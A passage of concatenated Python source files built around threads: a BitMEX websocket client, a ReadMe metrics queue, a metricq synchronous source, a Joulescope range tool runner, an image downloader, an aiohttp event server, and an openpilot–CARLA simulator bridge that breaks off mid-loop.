matchingInstruments = [i for i in instruments if i['symbol'] == symbol]
if len(matchingInstruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matchingInstruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def get_ticker(self, symbol):
'''Return a ticker object. Generated from instrument.'''
instrument = self.get_instrument(symbol)
# If this is an index, we have to get the data from the last trade.
if instrument['symbol'][0] == '.':
ticker = {}
ticker['mid'] = ticker['buy'] = ticker['sell'] = ticker['last'] = instrument['markPrice']
# Normal instrument
else:
bid = instrument['bidPrice'] or instrument['lastPrice']
ask = instrument['askPrice'] or instrument['lastPrice']
ticker = {
"last": instrument['lastPrice'],
"buy": bid,
"sell": ask,
"mid": (bid + ask) / 2
}
# The instrument has a tickSize. Use it to round values.
return {k: toNearest(float(v or 0), instrument['tickSize']) for k, v in iteritems(ticker)}
def funds(self):
return self.data['margin'][0]
def market_depth(self, symbol):
raise NotImplementedError('orderBook is not subscribed; use askPrice and bidPrice on instrument')
# return self.data['orderBook25'][0]
def open_orders(self, clOrdIDPrefix):
orders = self.data['order']
# Filter to only open orders (leavesQty > 0) and those that we actually placed
return [o for o in orders if str(o['clOrdID']).startswith(clOrdIDPrefix) and o['leavesQty'] > 0]
def position(self, symbol):
positions = self.data['position']
pos = [p for p in positions if p['symbol'] == symbol]
if len(pos) == 0:
# No position found; stub it
return {'avgCostPrice': 0, 'avgEntryPrice': 0, 'currentQty': 0, 'symbol': symbol}
return pos[0]
def recent_trades(self):
return self.data['trade']
#
# Lifecycle methods
#
def error(self, err):
self._error = err
self.logger.error(err)
self.exit()
def exit(self):
self.exited = True
self.ws.close()
#
# Private methods
#
def __connect(self, wsURL):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
ssl_defaults = ssl.get_default_verify_paths()
sslopt_ca_certs = {'ca_certs': ssl_defaults.cafile}
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=self.__get_auth()
)
setup_custom_logger('websocket', log_level=settings.LOG_LEVEL)
self.wst = threading.Thread(target=lambda: self.ws.run_forever(sslopt=sslopt_ca_certs))
self.wst.daemon = True
self.wst.start()
self.logger.info("Started thread")
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.logger.error("Couldn't connect to WS! Exiting.")
self.exit()
sys.exit(1)
def __get_auth(self):
'''Return auth headers. Will use API Keys if present in settings.'''
if self.shouldAuth is False:
return []
self.logger.info("Authenticating with API Key.")
# To auth to the WS using an API key, we generate a signature of a nonce and
# the WS API endpoint.
nonce = generate_expires()
return [
"api-expires: " + str(nonce),
"api-signature: " + generate_signature(settings.API_SECRET, 'GET', '/realtime', nonce, ''),
"api-key:" + settings.API_KEY
]
def __wait_for_account(self):
'''On subscribe, this data will come down. Wait for it.'''
# Wait for the keys to show up from the ws
while not {'margin', 'position', 'order'} <= set(self.data):
sleep(0.1)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
while not {'instrument', 'trade', 'quote'} <= set(self.data):
sleep(0.1)
def __send_command(self, command, args):
'''Send a raw command.'''
self.ws.send(json.dumps({"op": command, "args": args or []}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
try:
if 'subscribe' in message:
if message['success']:
self.logger.debug("Subscribed to %s." % message['subscribe'])
else:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.logger.debug("%s: partial" % table)
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, message['data']))
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > BitMEXWebsocket.MAX_TABLE_LEN:
self.data[table] = self.data[table][(BitMEXWebsocket.MAX_TABLE_LEN // 2):]
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, message['data']))
# Locate the item in the collection and update it.
for updateData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Log executions
if table == 'order':
is_canceled = 'ordStatus' in updateData and updateData['ordStatus'] == 'Canceled'
if 'cumQty' in updateData and not is_canceled:
contExecuted = updateData['cumQty'] - item['cumQty']
if contExecuted > 0:
instrument = self.get_instrument(item['symbol'])
self.logger.info("Execution: %s %d Contracts of %s at %.*f" %
(item['side'], contExecuted, item['symbol'],
instrument['tickLog'], item['price']))
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
if table == 'order' and item['leavesQty'] <= 0:
self.data[table].remove(item)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, message['data']))
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = findItemByKeys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error(traceback.format_exc())
def __on_open(self):
self.logger.debug("Websocket Opened.")
def __on_close(self):
self.logger.info('Websocket Closed')
self.exit()
def __on_error(self, ws, error):
if not self.exited:
self.error(error)
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def findItemByKeys(keys, table, matchData):
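    '''Return the first row of `table` whose values match `matchData` on every key in `keys`, or None.'''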
for item in table:
matched = True
for key in keys:
if item[key] != matchData[key]:
matched = False
if matched:
return item
if __name__ == "__main__":
# create console handler and set level to debug
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
# create formatter
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
# add formatter to ch
ch.setFormatter(formatter)
logger.addHandler(ch)
ws = BitMEXWebsocket()
ws.logger = logger
ws.connect("https://testnet.bitmex.com/api/v1")
while(ws.ws.sock.connected):
sleep(1)
|
Metrics.py
|
import atexit
import math
import queue
import threading
import requests
import json
import importlib
from readme_metrics import MetricsApiConfig
from readme_metrics.publisher import publish_batch
from readme_metrics.PayloadBuilder import PayloadBuilder
from readme_metrics.ResponseInfoWrapper import ResponseInfoWrapper
class Metrics:
"""
This is the internal central controller class invoked by the ReadMe middleware. It
queues requests for submission. The submission is processed by readme_metrics.publisher.publish_batch().
"""
PACKAGE_NAME: str = "readme/metrics"
def __init__(self, config: MetricsApiConfig):
"""
Constructs and initializes the ReadMe Metrics controller class with the
specified configuration.
Args:
config (MetricsApiConfig): Running configuration
"""
self.config = config
self.payload_builder = PayloadBuilder(
config.DENYLIST,
config.ALLOWLIST,
config.IS_DEVELOPMENT_MODE,
config.GROUPING_FUNCTION,
config.LOGGER,
)
self.queue = queue.Queue()
atexit.register(self.exit_handler)
def process(self, request, response: ResponseInfoWrapper) -> None:
"""Enqueues a request/response combination to be submitted the API.
Args:
request (Request): Request object from your WSGI server
response (ResponseInfoWrapper): Response object
"""
if not self.host_allowed(request.environ["HTTP_HOST"]):
self.config.LOGGER.debug(
f"Not enqueueing request, host {request.environ['HTTP_HOST']} not in ALLOWED_HTTP_HOSTS"
)
return
payload = self.payload_builder(request, response)
if payload is None:
# PayloadBuilder returns None when the grouping function returns
# None (an indication that the request should not be logged.)
self.config.LOGGER.debug(
f"Not enqueueing request, grouping function returned None"
)
return
self.queue.put(payload)
if self.queue.qsize() >= self.config.BUFFER_LENGTH:
args = (self.config, self.queue)
if self.config.IS_BACKGROUND_MODE:
thread = threading.Thread(target=publish_batch, daemon=True, args=args)
thread.start()
else:
publish_batch(*args)
def exit_handler(self) -> None:
if not self.queue.empty():
args = (self.config, self.queue)
for _ in range(math.ceil(self.queue.qsize() / self.config.BUFFER_LENGTH)):
if self.config.IS_BACKGROUND_MODE:
thread = threading.Thread(
target=publish_batch, daemon=True, args=args
)
thread.start()
else:
publish_batch(*args)
self.queue.join()
def host_allowed(self, host):
if self.config.ALLOWED_HTTP_HOSTS:
return host in self.config.ALLOWED_HTTP_HOSTS
else:
            # If ALLOWED_HTTP_HOSTS has not been set (None by default), allow the data to be queued.
return True
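# Hedged usage sketch (editor's addition). The MetricsApiConfig parameters shown are
# assumptions for illustration only; consult readme_metrics for the actual signature.
#
#   def grouping_function(request):
#       return {"api_key": "user-123", "label": "User 123", "email": "user@example.com"}
#
#   config = MetricsApiConfig("README_API_KEY", grouping_function, buffer_length=10)
#   metrics = Metrics(config)
#   # The WSGI middleware then calls, once a response is available:
#   #   metrics.process(request, ResponseInfoWrapper(...))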
|
synchronous_source.py
|
# Copyright (c) 2018, ZIH,
# Technische Universitaet Dresden,
# Federal Republic of Germany
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of metricq nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import asyncio
from threading import Event, Lock, Thread
from typing import Any, Dict
from .logging import get_logger
from .source import MetadataDict, Source
from .types import Timestamp
logger = get_logger(__name__)
class _SynchronousSource(Source):
def __init__(self, *args: Any, **kwargs: Any):
super().__init__(*args, **kwargs)
        # Note: this is a threading.Event (thread-safe), not an asyncio.Event
        # (which is not thread-safe). Readiness is signalled across threads and
        # there is no threading equivalent of an asyncio Future to use instead.
self.exception = None
self._ready_event = Event()
async def connect(self) -> None:
await super().connect()
self._ready_event.set()
def on_exception(
self, loop: asyncio.AbstractEventLoop, context: Dict[str, Any]
) -> None:
super().on_exception(loop, context)
if not self._ready_event.is_set():
self.exception = context["exception"]
self._ready_event.set()
async def task(self) -> None:
# Nothing to do, we are called from the outside
pass
def wait_for_ready(self, timeout: float) -> None:
if not self._ready_event.wait(timeout):
raise TimeoutError("SynchronousSource not ready in time")
if self.exception is not None:
logger.error(
"[_SynchronousSource] failed to wait for ready: {}", self.exception
)
raise self.exception
def run(self, *args: Any, **kwargs: Any) -> None:
super().run(catch_signals=())
class SynchronousSource:
_lock = Lock()
_tid = 0
def __init__(self, *args: Any, **kwargs: Any):
self._source = _SynchronousSource(*args, **kwargs)
self._thread = Thread(target=self._source.run)
with self._lock:
thread_id = SynchronousSource._tid
SynchronousSource._tid += 1
# MetricQ Synchronous Source Event Loop Thread
self._thread.name = "MQSSELT#{}".format(thread_id)
self._thread.start()
logger.debug("[SynchronousSource] spawning new thread {}", self._thread.name)
try:
self._source.wait_for_ready(60)
except Exception as e:
self.stop()
raise e
logger.info("[SynchronousSource] ready")
def send(
self,
metric: str,
time: Timestamp,
value: float,
block: bool = True,
timeout: float = 60,
) -> None:
f = asyncio.run_coroutine_threadsafe(
self._source.send(metric, time, value), self._source.event_loop
)
if block:
exception = f.exception(timeout)
if exception:
logger.error("[SynchronousSource] failed to send data {}", exception)
# Keep going for reconnect. If you want to panic, do the following instead
# self.stop()
# raise exception
def declare_metrics(
self, metrics: Dict[str, MetadataDict], block: bool = True, timeout: float = 60
) -> None:
f = asyncio.run_coroutine_threadsafe(
self._source.declare_metrics(metrics), self._source.event_loop
)
if block:
exception = f.exception(timeout)
if exception:
logger.error("[SynchronousSource] failed to send data {}", exception)
def stop(self, timeout: float = 60) -> None:
logger.info("[SynchronousSource] stopping")
f = asyncio.run_coroutine_threadsafe(
self._source.stop(), self._source.event_loop
)
exception = f.exception(timeout=timeout)
if exception:
logger.error("[SynchronousSource] stop call failed {}", exception)
logger.debug("[SynchronousSource] underlying source stopped")
self._thread.join()
logger.info("[SynchronousSource] thread joined")
|
range_tool.py
|
# Copyright 2018-2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run a tool that operates over a data range.
The tool is executed from a separate thread.
"""
from PySide2 import QtCore
import threading
import time
from queue import Queue, Empty
import logging
log = logging.getLogger(__name__)
SAMPLES_PER_ITERATION_DEFAULT_MIN = 1000
PROGRESS_COUNT = 1000
PROGRESS_UPDATE_RATE = 0.100 # seconds
class RangeToolIterable:
def __init__(self, parent, samples_per_iteration):
self._parent = parent
self._x_start, self._x_stop = self._parent.sample_range
self._x_next = self._x_start
self._samples_per_iteration = int(samples_per_iteration)
def __iter__(self):
return self
def __next__(self):
if self._x_next >= self._x_stop or self._parent.is_cancelled:
self._parent = None
raise StopIteration()
self._parent.progress((self._x_next - self._x_start) / (self._x_stop - self._x_start))
x_next = self._x_next + self._samples_per_iteration
if x_next > self._x_stop:
x_next = self._x_stop
data = self._parent._view.samples_get(self._x_next, x_next, units='samples')
self._x_next = x_next
return data
class RangeToolInvoke(QtCore.QObject): # also implements RangeToolInvocation
sigProgress = QtCore.Signal(int)
sigFinished = QtCore.Signal(object, str) # range_tool, error message or ''
sigClosed = QtCore.Signal(object) # range_tool
_sigToolClosed = QtCore.Signal()
def __init__(self, parent, resync_handler, range_tool, cmdp):
super().__init__(parent)
self._parent = parent
self._main_thread = threading.current_thread()
self._qt_resync_handler = resync_handler
self._range_tool = range_tool
self.cmdp = cmdp
self._range_tool_obj = None
self.sample_range = None
self._time_range = None
self._view = None
self._thread = None
self._message_queue = Queue()
self._cancel = False
self._progress_time_last = time.time()
self.sample_count = 0
self.sample_frequency = 0
self.calibration = None
self.statistics = None
self._iterable = None
self._commands = []
self._sigToolClosed.connect(self._finalize, type=QtCore.Qt.QueuedConnection)
cmdp.define('Plugins/#state/voltage_range', dtype=int, default=0) # for file export
def __iter__(self):
self._iterable = self.iterate()
return self._iterable
def __next__(self):
try:
return self._iterable.__next__()
except StopIteration:
self._iterable = None
raise
@property
def name(self):
return self._range_tool.name
@property
def is_cancelled(self):
return self._cancel
def samples_get(self):
return self._view.samples_get(*self.sample_range, units='samples')
def _assert_worker_thread(self):
assert (threading.current_thread() == self._thread)
def _assert_main_thread(self):
assert (threading.current_thread() == self._main_thread)
def iterate(self, samples_per_iteration=None):
self._assert_worker_thread()
if samples_per_iteration is None or samples_per_iteration <= 0:
if self.sample_frequency < SAMPLES_PER_ITERATION_DEFAULT_MIN:
samples_per_iteration = SAMPLES_PER_ITERATION_DEFAULT_MIN
else:
samples_per_iteration = int(self.sample_frequency)
else:
samples_per_iteration = int(samples_per_iteration)
return RangeToolIterable(self, samples_per_iteration)
def _qt_resync(self, cmd, args):
self._assert_worker_thread()
self._message_queue.put((cmd, args))
self._qt_resync_handler() # causes self.on_resync()
def progress(self, fraction):
self._assert_worker_thread()
current_time = time.time()
if current_time - self._progress_time_last > PROGRESS_UPDATE_RATE:
value = int(fraction * PROGRESS_COUNT)
self._qt_resync('progress', value)
self._progress_time_last = current_time
def _x_map_to_parent(self, x):
t1, t2 = self._time_range
if x < 0.0:
raise ValueError('x too small')
if x >= (t2 - t1):
raise ValueError('x too big')
return t1 + x
def marker_single_add(self, x):
x = self._x_map_to_parent(x)
self._commands.append(lambda: self.cmdp.publish('!Widgets/Waveform/Markers/single_add', x))
def marker_dual_add(self, x1, x2):
x1 = self._x_map_to_parent(x1)
x2 = self._x_map_to_parent(x2)
self._commands.append(lambda: self.cmdp.publish('!Widgets/Waveform/Markers/dual_add', (x1, x2)))
def run(self, view, statistics, x_start, x_stop):
"""Export data request.
:param view: The view implementation.
:param statistics: The statistics (see :meth:`joulescope.driver.statistics_get`).
:param x_start: The starting position in x-axis units.
:param x_stop: The stopping position in x-axis units.
"""
self._assert_main_thread()
self.statistics = statistics
t1, t2 = min(x_start, x_stop), max(x_start, x_stop)
log.info('range_tool %s(%s, %s)', self._range_tool.name, t1, t2)
self._time_range = (t1, t2)
s1 = max(view.time_to_sample_id(t1), 0) # negative sample_ids not allowed
s2 = view.time_to_sample_id(t2)
if s1 is None or s2 is None:
return self._abort('time out of range')
self.sample_range = (s1, s2)
self.sample_count = s2 - s1
self.sample_frequency = view.sampling_frequency
self.calibration = view.calibration
self._view = view
self._range_tool_obj = self._range_tool.fn()
try:
if hasattr(self._range_tool_obj, 'run_pre'):
rc = self._range_tool_obj.run_pre(self)
if rc is not None:
return self._abort(f'{self.name} run_pre failed: {rc}')
except:
log.exception('During range tool run_pre()')
return self._abort('Exception in range tool run_pre()')
self._thread = threading.Thread(target=self._thread_run)
self._thread.start()
def _abort(self, msg):
self.sigFinished.emit(self, msg)
self._finalize()
return msg
def _thread_run(self):
self._assert_worker_thread()
try:
rv = self._range_tool_obj.run(self)
if self.is_cancelled:
rv = f'{self._range_tool.name}: Cancelled'
except Exception as ex:
log.exception('range tool run exception')
rv = f'{self._range_tool.name}: ERROR'
self._cancel = True
self._qt_resync('done', rv)
def on_resync(self):
self._assert_main_thread() # indirectly by self._qt_resync_callback
while True:
try:
cmd, args = self._message_queue.get(timeout=0.0)
except Empty:
break
            except Exception:
                log.exception('on_resync message_queue get')
                break
if cmd == 'progress':
self.sigProgress.emit(args)
elif cmd == 'done':
self._on_finished(args)
@QtCore.Slot()
def on_cancel(self):
log.info('range tool cancelled by user')
self._cancel = True
def _on_finished(self, msg):
finalize_defer = False
self._assert_main_thread()
self.sigProgress.emit(1000)
self.sigProgress.disconnect()
self._thread.join()
self._thread = None
if not self.is_cancelled:
try:
if hasattr(self._range_tool_obj, 'run_post'):
finalize_defer = self._range_tool_obj.run_post(self)
except:
log.exception('During range tool run_post()')
self._cancel = True
while not self.is_cancelled and len(self._commands):
command = self._commands.pop(0)
try:
command()
except:
log.exception('During range tool command')
self.sigFinished.emit(self, msg)
if not finalize_defer:
self._finalize()
def on_tool_finished(self):
self._sigToolClosed.emit()
@QtCore.Slot()
def _finalize(self):
self._assert_main_thread()
log.info('range tool finalize')
self.sigClosed.emit(self)
self._range_tool_obj = None
self._parent = None
self._qt_resync_handler = None
self._range_tool = None
self.cmdp = None
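# --- Hedged usage sketch (not part of the original module). It illustrates the shape
# of a range tool object as consumed by RangeToolInvoke above: run_pre is called from
# run(), run from the worker thread, and run_post from _on_finished(); iterating the
# invocation yields sample chunks while reporting progress. The class name and the
# per-chunk processing are illustrative assumptions.
class ExampleRangeTool:
    def run_pre(self, invocation):
        # Returning a non-None value aborts the invocation with that message.
        return None
    def run(self, invocation):
        chunks = 0
        for _data in invocation:  # RangeToolIterable: yields chunks, emits progress
            chunks += 1
            if invocation.is_cancelled:
                break
        log.info('processed %d chunks over %d samples', chunks, invocation.sample_count)
        # The return value is forwarded through sigFinished as the completion message.
    def run_post(self, invocation):
        # Return True to defer finalization (e.g. while a results dialog is open).
        return False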
|
download_images.py
|
import os
import shutil
import threading
import time
import numpy as np
import pandas as pd
import requests
class DownloadData(object):
def __init__(self, input_csv, output_dir, num_threads=10):
self.input_csv = input_csv
self.output_dir = output_dir
self.num_threads = num_threads
def download_thread(self, urls, files):
for (url, img) in zip(urls, files):
img_path = os.path.join(self.output_dir, img + '.jpg')
if os.path.exists(img_path):
print("{} already exists, skipping".format(img_path))
continue
try:
response = requests.get(url, stream=True)
if response.status_code != 200:
print("Unable to access {}".format(url))
continue
            except Exception as e:
                print("Failed to download {}: {}".format(url, e))
                continue
with open(img_path, 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
def download_data(self):
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
df = pd.read_csv(self.input_csv)
url_chunks = np.array_split(df["image_url"].values, self.num_threads)
file_chunks = np.array_split(df["filename"].values, self.num_threads)
threads = []
for (url_chunk, file_chunk) in zip(url_chunks, file_chunks):
thread = threading.Thread(target=self.download_thread, args=(url_chunk, file_chunk))
thread.daemon = True
threads.append(thread)
thread.start()
        # Wait for all download threads to finish.
        for thread in threads:
            thread.join()
print("Total images downloaded: {}".format(len(os.listdir(self.output_dir))))
|
server.py
|
import asyncio
from socket import socket as Socket
import threading
from typing import Any, Callable, Dict, List, Optional, cast
from aiohttp import web
EventCallback = Callable[[Dict[str, Any]], None]
class Server:
"""A handle to a running server."""
def __init__(self, handle_event: EventCallback, host: str, port: int):
"""Initialize a Server."""
self.host = host
self.port = port
self.handle_event = handle_event
self._main_loop = asyncio.get_event_loop()
@property
def url(self) -> str:
return f"http://{self.host}:{self.port}"
def start(self) -> None:
"""Start a new server running in a background thread."""
app = web.Application()
app.add_routes([web.post("/", self._handle_request)])
self._runner = web.AppRunner(app)
self._startup_event = threading.Event()
self._server_loop = asyncio.new_event_loop()
t = threading.Thread(target=self._run)
t.start()
# Wait for server to startup
self._startup_event.wait()
def stop(self) -> None:
"""Gracefully stop a running server."""
# Call the server shutdown functions and wait for them to finish. These
# must be called on the server thread's event loop.
future = asyncio.run_coroutine_threadsafe(self._stop(), self._server_loop)
future.result(5)
# Stop the server thread's event loop
self._server_loop.call_soon_threadsafe(self._server_loop.stop)
async def _handle_request(self, request: web.Request) -> web.Response:
"""Handle an incoming request."""
event = await request.json()
# This handler will be called on the server thread. Call the external
# handler on the app thread.
self._main_loop.call_soon_threadsafe(self.handle_event, event)
return web.Response(text="OK")
def _run(self) -> None:
"""Execute the server in its own thread with its own event loop."""
asyncio.set_event_loop(self._server_loop)
self._server_loop.run_until_complete(self._runner.setup())
site = web.TCPSite(self._runner, self.host, self.port)
self._server_loop.run_until_complete(site.start())
# If the Server was initialized with port 0, determine what port the
# underlying server ended up listening on
if self.port == 0:
site_server = cast(asyncio.AbstractServer, site._server)
sockets = cast(List[Socket], site_server.sockets)
socket = sockets[0]
self.port = socket.getsockname()[1]
self._startup_event.set()
self._server_loop.run_forever()
async def _stop(self) -> None:
"""Stop the server."""
await self._runner.shutdown()
await self._runner.cleanup()
def create_server(
handle_event: EventCallback, host: str = "0.0.0.0", port: int = 0
) -> Server:
"""Create a new server."""
return Server(handle_event, host, port)
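# --- Hedged usage sketch (not part of the original module). Server.__init__ captures
# the current event loop and dispatches handle_event onto it, so that loop must be
# running for events to be delivered; the 30 second lifetime is an illustrative choice. ---
if __name__ == "__main__":
    def print_event(event: Dict[str, Any]) -> None:
        print("received event:", event)
    loop = asyncio.get_event_loop()      # becomes the "main" loop captured by Server
    server = create_server(print_event)  # port 0: an ephemeral port is chosen on start()
    server.start()
    print("listening on", server.url)
    try:
        loop.run_until_complete(asyncio.sleep(30))  # keep the main loop running
    finally:
        server.stop()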
|
bridge.py
|
#!/usr/bin/env python3
import time
import math
import atexit
import numpy as np
import threading
import random
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper
from lib.can import can_function, sendcan_function
from lib.helpers import FakeSteeringWheel
from selfdrive.car.honda.values import CruiseButtons
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--autopilot', action='store_true')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--realmonitoring', action='store_true')
args = parser.parse_args()
pm = messaging.PubMaster(['frame', 'sensorEvents', 'can'])
W,H = 1164, 874
def cam_callback(image):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0,1,2]].copy()
dat = messaging.new_message('frame')
dat.frame = {
"frameId": image.frame,
"image": img.tostring(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('frame', dat)
def imu_callback(imu):
#print(imu, imu.accelerometer)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def health_function():
pm = messaging.PubMaster(['health'])
rk = Ratekeeper(1.0)
while 1:
dat = messaging.new_message('health')
dat.valid = True
dat.health = {
'ignitionLine': True,
'hwType': "whitePanda",
'controlsAllowed': True
}
pm.send('health', dat)
rk.keep_time()
def fake_driver_monitoring():
if args.realmonitoring:
return
pm = messaging.PubMaster(['driverState'])
while 1:
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
time.sleep(0.1)
def go(q):
threading.Thread(target=health_function).start()
threading.Thread(target=fake_driver_monitoring).start()
import carla
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(5.0)
world = client.load_world('Town04')
settings = world.get_settings()
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
weather = carla.WeatherParameters(
cloudyness=0.1,
precipitation=0.0,
precipitation_deposits=0.0,
wind_intensity=0.0,
sun_azimuth_angle=15.0,
sun_altitude_angle=75.0)
world.set_weather(weather)
blueprint_library = world.get_blueprint_library()
"""
for blueprint in blueprint_library.filter('sensor.*'):
print(blueprint.id)
exit(0)
"""
world_map = world.get_map()
vehicle_bp = random.choice(blueprint_library.filter('vehicle.tesla.*'))
vehicle = world.spawn_actor(vehicle_bp, world_map.get_spawn_points()[16])
# make tires less slippery
wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 1326
physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
if args.autopilot:
vehicle.set_autopilot(True)
# print(vehicle.get_speed_limit())
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.45))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(imu_callback)
def destroy():
print("clean exit")
imu.destroy()
camera.destroy()
vehicle.destroy()
print("done")
atexit.register(destroy)
# can loop
sendcan = messaging.sub_sock('sendcan')
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
A_throttle = 2.
A_brake = 2.
A_steer_torque = 1.
fake_wheel = FakeSteeringWheel()
is_openpilot_engaged = False
in_reverse = False
throttle_out = 0
brake_out = 0
steer_angle_out = 0
while 1:
cruise_button = 0
    # check for an input message; this will not block
if not q.empty():
print("here")
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_angle_out = float(m[1])
fake_wheel.set_angle(steer_angle_out) # touching the wheel overrides fake wheel angle
# print(" === steering overriden === ")
if m[0] == "throttle":
throttle_out = float(m[1]) / 100.
if throttle_out > 0.3:
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "brake":
brake_out = float(m[1]) / 100.
if brake_out > 0.3:
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "reverse":
in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
if m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
if m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) * 3.6
can_function(pm, speed, fake_wheel.angle, rk.frame, cruise_button=cruise_button, is_engaged=is_openpilot_engaged)
    if rk.frame%1 == 0: # runs every frame (100Hz); would need rk.frame % 5 for 20Hz
